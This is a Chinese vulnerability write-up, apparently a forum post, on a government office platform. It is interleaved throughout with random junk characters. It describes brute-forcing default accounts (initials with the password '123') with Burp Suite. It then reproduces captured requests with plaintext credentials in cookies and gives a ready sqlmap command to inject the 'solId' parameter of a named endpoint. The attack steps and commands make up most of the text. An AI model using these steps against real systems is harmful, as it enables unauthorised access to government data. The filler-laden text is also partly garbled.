|
Q3 Y5 n$ ]' D/ z: T) L9 V E4 U- H; d! G4 c& {
R4 I7 [) u, l X+ M- c# ^% o9 |7 J! Q1 Q9 {6 }
平台简介:
, @6 P- s2 }+ J$ e2 d; Z
; }( B: f- j ~- ^5 _
2 W" l# Y: |) |/ k& r. e + \/ h: t( L9 }) l4 G" m# z
4 z& T( R8 G# L$ ?' X2 D6 ^& d- {8 r0 x* V9 p5 N" b
北京同联信息技术有限公司(以下简称同联)由用友政务与用友原行业事业部团队合伙出资成立。同联以“为全国各级政府单位提供信息化咨询规划、建设解决方案和信息化运维服务,以加强各级政府的精细化、智能化管理,形成高效、敏捷、便民的新型政府。”为使命,致力于为各级政府单位提供专业、标准、灵活、易用的信息化产品及专业的服务。
; V/ a' h8 T7 T; h4 g$ M同联面向政府单位提供专业、标准、灵活、易用的信息化产品。针对各级政府单位,分别提供以“移动政务办公”为主的Da3系列管理软件;针对政法单位提供以“协同办案”为核心的政法协同办案系统等。
; x' b# s- k& Y W2 z! u2 k" l同联本着“协作、专业、创新”的工作方针,为推动各级政府单位信息化、促进各级政府快速转型为 “智慧型政府”做出积极贡献!
2 ]% H( i7 k0 }/ O9 H, Y6 q
@( ?- I4 Z$ a: k7 }$ |5 M8 k+ r$ g" t2 [
0 M& X: o( h# h! ^2 y
& w& T' g7 N+ [
7 K) D0 U: a7 l 由于此程序为新开发的程序,故能找到的案例并不多,下面附案例地址:
8 f, `$ e% Q/ X( F! q4 h
* V" H1 M* s/ F, y" U2 Q) z4 r6 e6 f' V2 M# k
: c( Y7 a1 f4 o$ ~- o9 h Q
* W' _$ r! p& I- J1 t
4 U6 J% X- z, L m1 q http://1.1.1.1:7197/cap-aco/#(案例2-)( {' O1 o: a, W8 o$ v* L
9 f- I/ F) }) k( l% f, |* w' \
/ H( t" D& i8 o1 r http://www.XXOO.com (案例1-官网网站)6 r& {: U1 k z0 V% y9 i
0 s% x$ l# t# Q% Y m* e; h6 V( H' D# `/ P
) n3 ]0 g) f3 J. I4 q2 g6 k
6 F- w) {% |- ?
; i- T2 T, J2 f, Y: x2 S. f3 P, j 漏洞详情:( z) Y4 @0 |9 ^. n! ~$ L G {9 b: v
* }( Q2 q. K8 h# ~6 }6 Z
5 {* g9 U3 ?: y; }5 j i
初步确定平台的默认账号为姓名的首字母小写,初始密码为123,为了能够更好的模拟入侵,使用黑盒测试手段进行测试
, ^% |0 V# p! [; x# E/ e; R1 J 1 b2 S, F9 d# H4 W) x* @8 v7 g
# s" m6 u, \) B U1 i: x1 D B
首先使用burpsuite代理,然后再用黑客字典生成一个全英文小写的3位字典,利用burpsuite进行暴力破解,破解结果如图:
0 L3 c6 s8 E, t) u( c1 c$ R) y, f
, B" A9 f5 Y4 O( G" @/ a7 @4 d9 N. m+ z0 x# e5 d
* @- M# S- S0 s& }2 N( d6 A, Y
4 y8 o$ u% S& ?. }- Y. H& A
5 ~1 Q0 \9 ?3 S% B# `& e ( u+ o) {6 D* i, r) Q0 t# c
! R6 {5 I9 d, e. g% f- ^; \$ G2 s
status为302即表示破解成功,然后找个破解成功的账号登录系统。经过长时间的手工测试发现在发文管理模块抓包,抓包的数据分别如下:- |0 f W: h9 ~) }7 U
- C) B& P% }" \* R
! C6 Z Q. a# \ 1、案例1-官方网站
8 O4 T- ]) a7 b4 ?/ `# @0 O4 E- _) G& L
! A: E; Z E& h
' U+ h+ [ y, ]0 N2 k1 H GET /bpmRuBizInfoController/findBpmRuBizInfoBySolId?rows=10&page=0&solId=42b0234e-d5dc-402d-9cef-1ce38cbae480&state=&title=1111&sortOrder=DESC&query=bizTitle_%3D%26URGENCY_%3D%26STATE_%3D%26startTime%3D%26endTime%3D&_=1510060789826 HTTP/1.1
6 W7 ^! l2 A# E& T/ O4 A+ ~8 Q! D
% d5 \( N; w$ v5 K! Z- [! R6 F* _) q g% g( l
Host: www.XXOO.com
. B: d" l4 h7 K4 p 5 m0 O, o: q" @1 N+ b5 \% s. H
! w4 P6 I3 r( K( h' R" O' s Proxy-Connection: Keep-Alive! G' h8 \) ^+ Z t! w
8 l: f' N: |# R" E- B
$ s& [5 ^+ X; S' ~3 n5 w
Accept: application/json, text/javascript, */*; q=0.01
$ _/ X6 V4 v4 a; U
) p! n7 u L+ A- Z( S: w2 b% N
+ M3 F- C6 }6 h" f/ d Accept-Language: zh-CN
# @8 W- s$ P4 W0 H, p
4 z: a& k7 V% z" X) n& \% Q# V1 L. Y
Content-Type: application/json
' A: g- n1 E D
% s, ~- }, ^" v& D* a+ c3 o
4 _2 h4 @) y) y, e v& d1 F5 p User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0; SE 2.X MetaSr 1.0) like Gecko4 @; ?. t, R9 `' ]; G: z
- k0 q+ R( s) S5 O, {% @
' ?0 |0 @) V$ e# ^+ R6 [
X-Requested-With: XMLHttpRequest
% T2 m1 ~% o9 z; `- P2 ~( y9 W ; S' s! x D& X4 x! @
6 V. q5 i. t# `, {5 @
Referer: http://www.XXOO.com/bizRunContro ... 80?modCode=1008M002" I* D# z7 ~. G8 `" ^
, { k0 \ Q% h& a, M
; K& A5 v7 D! K1 ? Accept-Encoding: gzip, deflate, sdch
" h& D; n1 _( C/ k
" T0 e/ t/ M/ J; [6 h }4 p5 c" T) @" p; v+ J. q
Cookie: username=chm; password=123; rememberme=1; autoSubmit=1; sid=2cf5142f-6c1e-4cbb-89d8-2ebd08438b2e
. @" D2 q2 C; {
2 N+ G: i/ ~6 ]8 f0 a
& V4 H' s2 \1 ]! s2 V 将上面post数据包复制到txt文本里保存为tl.txt并将其放到sqlmap根目录下利用sqlmap注入命令为:sqlmap.py -r tl.txt --dbms=mysql --level 5 --risk 3 --tamper=space2hash.py -p solId --is-dba 注入如图:5 i, Q# A8 J# S; z/ {; P
( P6 E7 P$ ?2 w9 f0 g4 B# L" H
4 ^3 g3 ^* _* G+ [( {) v & w; L$ _$ |( [3 n1 x- Q
7 c: h/ L+ }- d9 @. b
/ o3 v* l% t9 r! F" W7 p
" g" y1 H; S9 w, T( K " l- w% Z' }6 ]# R1 ~ @6 |0 D
: H! [ r8 i4 p, ^& V% y
# J0 r, e& o( n K
' f. H8 \: a: F6 m* ^0 O% w
: J0 ]! a: J$ p
0 V8 `3 L. Q, P% [* i
9 l% U) U J6 u# z2 w% ~- U# {" l" D2 V* K4 b$ e% C1 }
1 R7 D l1 R8 U9 I q. [
. ?( L5 J5 g% Y7 J) u! x4 s! Z/ w6 }( ^1 Q% C& \3 q6 b6 @/ E% ~1 o
2、案例2-某天河云平台# ?/ ^4 R' a6 D& R
/ `6 Z3 Q; B) B. y$ g& }5 f, B9 t4 j$ l/ s3 J$ j- t: f; c
GET /cap-aco/bpmRuBizInfoController/findBpmRuBizInfoBySolId?rows=10&page=0&solId=af056885-4ae5-4e0b-8a0d-c413a786f2db&state=&title=11111&sortOrder=DESC&query=bizTitle_%3D%26URGENCY_%3D%26STATE_%3D%26startTime%3D%26endTime%3D&_=1510047738662 HTTP/1.1
; O' d. G! g$ C: L8 e" t$ F0 _ 8 Y/ T7 x/ `. h( U& v
5 i2 F9 k* q$ u1 t* R. e) ~, s
Host: 1.1.1.:7197
7 y- h* R: O/ H/ s8 x
3 i0 w) @( z* ~0 ]& p: y- h9 F4 @; M- c+ q
Accept: application/json, text/javascript, */*; q=0.01: ?7 l& K) l2 O& u8 ]1 r
" H' W/ c4 G7 C7 v. b# T" i. S
! Z8 L" `, z1 | g. Q) P X-Requested-With: XMLHttpRequest
0 F; V& ?% D# J5 O$ D; M. \
2 \: P1 P. @7 H. u& s! l* `6 r$ z( s) D3 E" X
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.221 Safari/537.36 SE 2.X MetaSr 1.0+ j h8 m% E9 T1 W
0 s$ e# b- n) q6 j0 b
8 {' G+ g/ g/ Y' F3 |0 B; a/ O Content-Type: application/json
- [% ?5 k, q, f3 V, R
0 @4 |4 k: D: H, N6 I6 R1 C
, [' z7 A- b' B( w/ E Referer: http://1.1.1.1:7197/cap-aco/bizR ... 86f2db?modCode=1008
; B* I7 N" ?+ b1 J) ]5 {
4 L" c( ?1 L$ Q
7 E$ P. Z6 G/ \, O6 Z* z Accept-Language: zh-CN,zh;q=0.8
. |, P6 a* d, I F! P' @
! n0 {3 j9 U4 s6 q/ H( [. {, P# u
Cookie: autoSubmit=1; sid=4e333ec9-d194-456b-bb08-4ff64c6eb1fc; username=lxr; password=123; rememberme=1; autoSubmit=1. @9 i1 t9 V" F; g! Y
! n1 n6 j) S7 k% {5 Q5 x _
. a) Q6 v8 E. Z$ o Connection: close/ a" E& Q/ A) `) U2 X. I
' ?& O! S2 Z5 o+ I0 r3 b4 p& l3 ^3 d0 B4 d- T$ e, s- N/ [
将上面post数据包复制到txt文本里保存为tl.txt并将其放到sqlmap根目录下利用sqlmap注入命令为:sqlmap.py -r 1.txt --dbms=mysql --level 5 --risk 3 --tamper=space2hash.py -p solId --is-dba 注入如图:
p* s. F W* | u* w, R ! U$ t3 q/ b y+ y x+ f
2 R& y2 D9 V6 e1 Y6 M N1 y8 Y% k
' m# T0 k6 j: j* @2 @$ H
% X+ \# w9 ]4 k$ G5 \$ L; h$ f! |1 z; F! R8 \' Z1 w1 A! V& x
1 c3 \$ ^7 Z% X; H* N! E
|